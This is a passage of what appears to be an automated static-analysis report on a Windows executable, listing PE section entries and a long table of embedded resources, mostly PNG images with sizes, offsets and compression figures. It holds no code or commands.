                                  .idata0xf00000x140000x13e00a6fdfc22de58e230668e6140af18f713False0.20748575078616352data5.442044496747251IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .tls0x1040000x10000x100023a516eee44fe9d482d78f4329d3baa2False0.392822265625data4.09924522772341IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rdata0x1050000xb0000x2007630f45a6a5af0e127c28e46ae9ee2bbFalse0.05078125data0.18415065608732903IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .rsrc0x1100000x312d9e0x312e00bfa7a1e9c6f9ea922181699866c1a9f4unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                  Resources

                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                  MAD0x11529c0x14data1.25
                                  MAD0x1152b00x10ea4data1.0004474337509381
                                  PNG0x1261540x269bPNG image data, 340 x 205, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9596276434281089
                                  PNG0x1287f00x2248PNG image data, 340 x 205, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9644484958979034
                                  PNG0x12aa380x1915PNG image data, 340 x 205, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9484503971344027
                                  PNG0x12c3500x2114PNG image data, 340 x 205, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9636277751535192
                                  PNG0x12e4640x18fPNG image data, 19 x 18, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0275689223057645
                                  PNG0x12e5f40x238PNG image data, 19 x 18, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0193661971830985
                                  PNG0x12e82c0x5059PNG image data, 205 x 45, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.996159268802567
                                  PNG0x1338880x219PNG image data, 19 x 18, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0204841713221602
                                  PNG0x133aa40x258PNG image data, 19 x 18, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0183333333333333
                                  PNG0x133cfc0x203PNG image data, 40 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0155339805825243
                                  PNG0x133f000x358PNG image data, 40 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0128504672897196
                                  PNG0x1342580x153PNG image data, 40 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9911504424778761
                                  PNG0x1343ac0x34aPNG image data, 40 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.013064133016627
                                  PNG0x1346f80x2c6PNG image data, 40 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0154929577464789
                                  PNG0x1349c00x114ePNG image data, 49 x 46, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0024830699774265
                                  PNG0x135b100x18a8PNG image data, 61 x 57, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.001742712294043
                                  PNG0x1373b80x1e62PNG image data, 73 x 69, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.001414245307277
                                  PNG0x13921c0x30a5PNG image data, 98 x 92, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.000883321288043
                                  PNG0x13c2c40x475dPNG image data, 122 x 115, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0008758005364278
                                  PNG0x140a240x6328PNG image data, 206 x 48, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.44425622439331863
                                  PNG0x146d4c0x608PNG image data, 60 x 60, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0071243523316062
                                  PNG0x1473540x801PNG image data, 60 x 60, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0053684724255734
                                  PNG0x147b580x782PNG image data, 60 x 60, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.005723204994797
                                  PNG0x1482dc0x7c3PNG image data, 60 x 60, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0055359838953195
                                  PNG0x148aa00x3f16PNG image data, 490 x 270, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9763467492260062
                                  PNG0x14c9b80x7b96PNG image data, 205 x 257, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9983564068525191
                                  PNG0x1545500x27fePNG image data, 768 x 64, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9854463762453605
                                  PNG0x156d500x13dPNG image data, 16 x 16, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.003154574132492
                                  PNG0x156e900x167PNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0139275766016713
                                  PNG0x156ff80x182PNG image data, 24 x 24, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0129533678756477
                                  PNG0x15717c0x197PNG image data, 32 x 32, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0171990171990173
                                  PNG0x1573140x213PNG image data, 40 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0207156308851224
                                  PNG0x1575280x1ffPNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0215264187866928
                                  PNG0x1577280x268PNG image data, 25 x 25, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0178571428571428
                                  PNG0x1579900x2baPNG image data, 30 x 30, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.015759312320917
                                  PNG0x157c4c0x41dPNG image data, 50 x 50, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0104463437796771
                                  PNG0x15806c0x4fbPNG image data, 60 x 60, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.008627450980392
                                  PNG0x1585680x6b0PNG image data, 80 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0064252336448598
                                  PNG0x158c180x896PNG image data, 100 x 100, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0050045495905369
                                  PNG0x1594b00x21ePNG image data, 50 x 50, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0018450184501846
                                  PNG0x1596d00x253PNG image data, 60 x 60, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0033613445378151
                                  PNG0x1599240x275PNG image data, 80 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.8712241653418124
                                  PNG0x159b9c0x39ePNG image data, 100 x 100, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.8704103671706264
                                  PNG0x159f3c0x286PNG image data, 50 x 50, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0170278637770898
                                  PNG0x15a1c40x2efPNG image data, 60 x 60, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.014647137150466
                                  PNG0x15a4b40x3eePNG image data, 80 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9701789264413518
                                  PNG0x15a8a40x4d2PNG image data, 100 x 100, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9619124797406807
                                  PNG0x15ad780x410PNG image data, 50 x 50, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.010576923076923
                                  PNG0x15b1880x51cPNG image data, 60 x 60, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0084097859327217
                                  PNG0x15b6a40x6d1PNG image data, 80 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0063037249283668
                                  PNG0x15bd780x832PNG image data, 100 x 100, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0052430886558628
                                  PNG0x15c5ac0x3a9PNG image data, 50 x 50, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0117395944503735
                                  PNG0x15c9580x43dPNG image data, 60 x 60, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0101382488479262
                                  PNG0x15cd980x5bbPNG image data, 80 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0074982958418541
                                  PNG0x15d3540x71cPNG image data, 100 x 100, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.006043956043956
                                  PNG0x15da700x1f4PNG image data, 18 x 18, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.022
                                  PNG0x15dc640x266PNG image data, 23 x 23, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.017915309446254
                                  PNG0x15decc0x2c9PNG image data, 28 x 28, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0154277699859748
                                  PNG0x15e1980x386PNG image data, 37 x 37, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0121951219512195
                                  PNG0x15e5200x470PNG image data, 46 x 46, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0096830985915493
                                  PNG0x15e9900x10dPNG image data, 40 x 32, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0
                                  PNG0x15eaa00x1efPNG image data, 50 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0121212121212122
                                  PNG0x15ec900x1baPNG image data, 60 x 48, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9932126696832579
                                  PNG0x15ee4c0x165PNG image data, 80 x 64, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.7675070028011205
                                  PNG0x15efb40x20bPNG image data, 100 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.8107074569789675
                                  PNG0x15f1c00x10dPNG image data, 40 x 32, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0
                                  PNG0x15f2d00x1e0PNG image data, 50 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0041666666666667
                                  PNG0x15f4b00x17dPNG image data, 60 x 48, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.979002624671916
                                  PNG0x15f6300x165PNG image data, 80 x 64, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.7703081232492998
                                  PNG0x15f7980x20ePNG image data, 100 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.8098859315589354
                                  PNG0x15f9a80xf3PNG image data, 40 x 32, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9794238683127572
                                  PNG0x15fa9c0xfaPNG image data, 50 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.948
                                  PNG0x15fb980x119PNG image data, 60 x 48, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9466192170818505
                                  PNG0x15fcb40x14bPNG image data, 80 x 64, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.7190332326283988
                                  PNG0x15fe000x17ePNG image data, 100 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.6544502617801047
                                  PNG0x15ff800xefPNG image data, 40 x 32, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9832635983263598
                                  PNG0x1600700xfePNG image data, 50 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9803149606299213
                                  PNG0x1601700x11aPNG image data, 60 x 48, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9680851063829787
                                  PNG0x16028c0x14fPNG image data, 80 x 64, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.7194029850746269
                                  PNG0x1603dc0x181PNG image data, 100 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.6311688311688312
                                  PNG0x1605600x105PNG image data, 40 x 32, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9693486590038314
                                  PNG0x1606680x115PNG image data, 50 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0
                                  PNG0x1607800x122PNG image data, 60 x 48, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9896551724137931
                                  PNG0x1608a40x16cPNG image data, 80 x 64, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.8159340659340659
                                  PNG0x160a100x1a1PNG image data, 100 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.7553956834532374
                                  PNG0x160bb40x103PNG image data, 40 x 32, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.972972972972973
                                  PNG0x160cb80x118PNG image data, 50 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.975
                                  PNG0x160dd00x126PNG image data, 60 x 48, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9285714285714286
                                  PNG0x160ef80x16fPNG image data, 80 x 64, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.8092643051771117
                                  PNG0x1610680x1a5PNG image data, 100 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.7505938242280285
                                  PNG0x1612100xdePNG image data, 40 x 32, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9234234234234234
                                  PNG0x1612f00xe9PNG image data, 50 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9313304721030042
                                  PNG0x1613dc0xf0PNG image data, 60 x 48, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.875
                                  PNG0x1614cc0x138PNG image data, 80 x 64, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.6538461538461539
                                  PNG0x1616040x16aPNG image data, 100 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.5994475138121547
                                  PNG0x1617700xdcPNG image data, 40 x 32, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9090909090909091
                                  PNG0x16184c0xe8PNG image data, 50 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9353448275862069
                                  PNG0x1619340xf2PNG image data, 60 x 48, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9132231404958677
                                  PNG0x161a280x13dPNG image data, 80 x 64, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.6624605678233438
                                  PNG0x161b680x16fPNG image data, 100 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.6103542234332425
                                  PNG0x161cd80x1b7PNG image data, 16 x 16, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0250569476082005
                                  PNG0x161e900x21cPNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0203703703703704
                                  PNG0x1620ac0x279PNG image data, 24 x 24, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0173775671406002
                                  PNG0x1623280x310PNG image data, 32 x 32, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0140306122448979
                                  PNG0x1626380x3bcPNG image data, 40 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0115062761506277
                                  PNG0x1629f40x386PNG image data, 16 x 16, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0121951219512195
                                  PNG0x162d7c0x4c2PNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0090311986863711
                                  PNG0x1632400x665PNG image data, 24 x 24, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0067196090409285
                                  PNG0x1638a80x998PNG image data, 32 x 32, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0044788273615635
                                  PNG0x1642400xd0fPNG image data, 40 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.003290457672749
                                  PNG0x164f500x2b0PNG image data, 32 x 16, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0159883720930232
                                  PNG0x1652000x3c5PNG image data, 42 x 21, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.01139896373057
                                  PNG0x1655c80x4a3PNG image data, 52 x 26, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0092670598146587
                                  PNG0x165a6c0x5d7PNG image data, 63 x 31, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0073578595317725
                                  PNG0x1660440x715PNG image data, 84 x 42, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0060672917815774
                                  PNG0x16675c0x5e2PNG image data, 40 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0073041168658698
                                  PNG0x166d400x6f5PNG image data, 50 x 50, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0061763054463784
                                  PNG0x1674380x7cbPNG image data, 60 x 60, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0055137844611528
                                  PNG0x167c040xa5fPNG image data, 80 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0041431261770244
                                  PNG0x1686640xcfaPNG image data, 100 x 100, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9993979530403372
                                  PNG0x1693600x7c6PNG image data, 40 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0055276381909548
                                  PNG0x169b280x7a2PNG image data, 50 x 50, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0056294779938588
                                  PNG0x16a2cc0xa9ePNG image data, 60 x 60, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.004047093451067
                                  PNG0x16ad6c0x11ecPNG image data, 80 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0023975588491718
                                  PNG0x16bf580x176ePNG image data, 100 x 100, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.001833944648216
                                  PNG0x16d6c80x823PNG image data, 40 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0052808449351895
                                  PNG0x16deec0xa2cPNG image data, 50 x 50, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0042242703533026
                                  PNG0x16e9180xc07PNG image data, 60 x 60, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0035725885027607
                                  PNG0x16f5200x102fPNG image data, 80 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0026550808592807
                                  PNG0x1705500x125fPNG image data, 100 x 100, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.002338932596215
                                  PNG0x1717b00x6b6PNG image data, 40 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0064027939464493
                                  PNG0x171e680x8b7PNG image data, 50 x 50, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0049305244285074
                                  PNG0x1727200xafcPNG image data, 60 x 60, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0039118065433854
                                  PNG0x17321c0x110ePNG image data, 80 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0025194686211636
                                  PNG0x17432c0x146aPNG image data, 100 x 100, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9980864906238041
                                  PNG0x1757980x109PNG image data, 16 x 16, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0075471698113208
                                  PNG0x1758a40x464PNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.7135231316725978
                                  PNG0x175d080x462PNG image data, 24 x 24, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.7112299465240641
                                  PNG0x17616c0x479PNG image data, 32 x 32, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.7170305676855895
                                  PNG0x1765e80x4b9PNG image data, 40 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.7377998345740281
                                  PNG0x176aa40x6dcPNG image data, 24 x 23, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.00626423690205
                                  PNG0x1771800x939PNG image data, 30 x 29, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0046590427784836
                                  PNG0x177abc0xb1fPNG image data, 36 x 34, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0038637161924833
                                  PNG0x1785dc0x1151PNG image data, 48 x 46, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0024813895781637
                                  PNG0x1797300x17bePNG image data, 60 x 57, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0018098058571898
                                  PNG0x17aef00x7a9PNG image data, 68 x 22, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0056093829678736
                                  PNG0x17b69c0x122PNG image data, 9 x 8, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.006896551724138
                                  PNG0x17b7c00x103PNG image data, 9 x 8, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0038610038610039
                                  PNG0x17b8c40x146PNG image data, 14 x 14, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0153374233128833
                                  PNG0x17ba0c0x134PNG image data, 14 x 14, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0064935064935066
                                  PNG0x17bb400x164PNG image data, 14 x 14, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0196629213483146
                                  PNG0x17bca40x1c6PNG image data, 16 x 16, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.024229074889868
                                  PNG0x17be6c0x21dPNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0203327171903882
                                  PNG0x17c08c0x26fPNG image data, 24 x 24, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0176565008025682
                                  PNG0x17c2fc0x2f4PNG image data, 32 x 32, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0145502645502646
                                  PNG0x17c5f00x3adPNG image data, 40 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0116896918172158
                                  PNG0x17c9a00x1524PNG image data, 64 x 60, 8-bit/color RGB, non-interlacedEnglishGreat Britain1.0020325203252032
                                  PNG0x17dec40x1d78PNG image data, 80 x 75, 8-bit/color RGB, non-interlacedEnglishGreat Britain1.001458112407211
                                  PNG0x17fc3c0x27c8PNG image data, 96 x 90, 8-bit/color RGB, non-interlacedEnglishGreat Britain1.0010801256873527
                                  PNG0x1824040x3a7aPNG image data, 128 x 120, 8-bit/color RGB, non-interlacedEnglishGreat Britain1.0007348029392118
                                  PNG0x185e800x51f4PNG image data, 160 x 150, 8-bit/color RGB, non-interlacedEnglishGreat Britain1.0007626310772164
                                  PNG0x18b0740x3946PNG image data, 120 x 113, 8-bit/color RGB, non-interlacedEnglishGreat Britain1.0007502387123175
                                  PNG0x18e9bc0x4aadPNG image data, 150 x 141, 8-bit/color RGB, non-interlacedEnglishGreat Britain1.000836951404509
                                  PNG0x19346c0x6301PNG image data, 180 x 169, 8-bit/color RGB, non-interlacedEnglishGreat Britain1.000631288222529
                                  PNG0x1997700xaa7bPNG image data, 240 x 226, 8-bit/color RGB, non-interlacedEnglishGreat Britain1.000481176821025
                                  PNG0x1a41ec0xcc64PNG image data, 300 x 282, 8-bit/color RGB, non-interlacedEnglishGreat Britain1.000496903906429
                                  PNG0x1b0e500x107fPNG image data, 48 x 48, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0026047833293867
                                  PNG0x1b1ed00x157dPNG image data, 60 x 60, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.00199963642974
                                  PNG0x1b34500x1dc2PNG image data, 72 x 72, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0014439485429247
                                  PNG0x1b52140x2facPNG image data, 96 x 96, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0009013438216978
                                  PNG0x1b81c00x432cPNG image data, 120 x 120, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0009304489416144
                                  PNG0x1bc4ec0x102PNG image data, 40 x 32, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9922480620155039
                                  PNG0x1bc5f00x1b6PNG image data, 50 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9908675799086758
                                  PNG0x1bc7a80x16cPNG image data, 60 x 48, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9752747252747253
                                  PNG0x1bc9140x170PNG image data, 80 x 64, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.779891304347826
                                  PNG0x1bca840x201PNG image data, 100 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.8031189083820662
                                  PNG0x1bcc880xf6PNG image data, 40 x 32, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9959349593495935
                                  PNG0x1bcd800xffPNG image data, 50 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.984313725490196
                                  PNG0x1bce800x118PNG image data, 60 x 48, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9714285714285714
                                  PNG0x1bcf980x14fPNG image data, 80 x 64, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.7253731343283583
                                  PNG0x1bd0e80x182PNG image data, 100 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.6373056994818653
                                  PNG0x1bd26c0xddPNG image data, 40 x 32, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9140271493212669
                                  PNG0x1bd34c0xe9PNG image data, 50 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9356223175965666
                                  PNG0x1bd4380xf3PNG image data, 60 x 48, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9135802469135802
                                  PNG0x1bd52c0x13ePNG image data, 80 x 64, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.6666666666666666
                                  PNG0x1bd66c0x16fPNG image data, 100 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.6076294277929155
                                  PNG0x1bd7dc0x112PNG image data, 40 x 32, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9817518248175182
                                  PNG0x1bd8f00x119PNG image data, 50 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9786476868327402
                                  PNG0x1bda0c0x127PNG image data, 60 x 48, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9322033898305084
                                  PNG0x1bdb340x170PNG image data, 80 x 64, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.8097826086956522
                                  PNG0x1bdca40x1a6PNG image data, 100 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.7535545023696683
                                  PNG0x1bde4c0xc6PNG image data, 9 x 8, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9949494949494949
                                  PNG0x1bdf140xfdPNG image data, 11 x 10, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0
                                  PNG0x1be0140x121PNG image data, 13 x 12, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0069204152249136
                                  PNG0x1be1380xedPNG image data, 18 x 16, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0
                                  PNG0x1be2280x115PNG image data, 22 x 20, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0
                                  PNG0x1be3400xc5PNG image data, 9 x 8, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9898477157360406
                                  PNG0x1be4080xfaPNG image data, 11 x 10, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.004
                                  PNG0x1be5040xddPNG image data, 13 x 12, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9547511312217195
                                  PNG0x1be5e40x14aPNG image data, 18 x 16, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.009090909090909
                                  PNG0x1be7300x128PNG image data, 22 x 20, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.010135135135135
                                  PNG0x1be8580xc0PNG image data, 8 x 9, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.984375
                                  PNG0x1be9180xcbPNG image data, 10 x 11, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9852216748768473
                                  PNG0x1be9e40x116PNG image data, 12 x 13, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0071942446043165
                                  PNG0x1beafc0xebPNG image data, 16 x 18, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9957446808510638
                                  PNG0x1bebe80x11bPNG image data, 20 x 22, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0
                                  PNG0x1bed040xbePNG image data, 8 x 9, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9894736842105263
                                  PNG0x1bedc40xd0PNG image data, 10 x 11, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9711538461538461
                                  PNG0x1bee940xdcPNG image data, 12 x 13, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.990909090909091
                                  PNG0x1bef700xe8PNG image data, 16 x 18, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0
                                  PNG0x1bf0580xffPNG image data, 20 x 22, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0
                                  PNG0x1bf1580xbcPNG image data, 8 x 9, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9893617021276596
                                  PNG0x1bf2140xcbPNG image data, 10 x 11, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9802955665024631
                                  PNG0x1bf2e00x112PNG image data, 12 x 13, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9598540145985401
                                  PNG0x1bf3f40xefPNG image data, 16 x 18, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0
                                  PNG0x1bf4e40x119PNG image data, 20 x 22, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0
                                  PNG0x1bf6000xbfPNG image data, 8 x 9, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9842931937172775
                                  PNG0x1bf6c00xcfPNG image data, 10 x 11, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9855072463768116
                                  PNG0x1bf7900xdePNG image data, 12 x 13, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9954954954954955
                                  PNG0x1bf8700xecPNG image data, 16 x 18, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9957627118644068
                                  PNG0x1bf95c0xfaPNG image data, 20 x 22, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0
                                  PNG0x1bfa580xbePNG image data, 9 x 8, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9947368421052631
                                  PNG0x1bfb180xc8PNG image data, 11 x 10, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.99
                                  PNG0x1bfbe00xbda3PNG image data, 13 x 12, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.7202916761076894
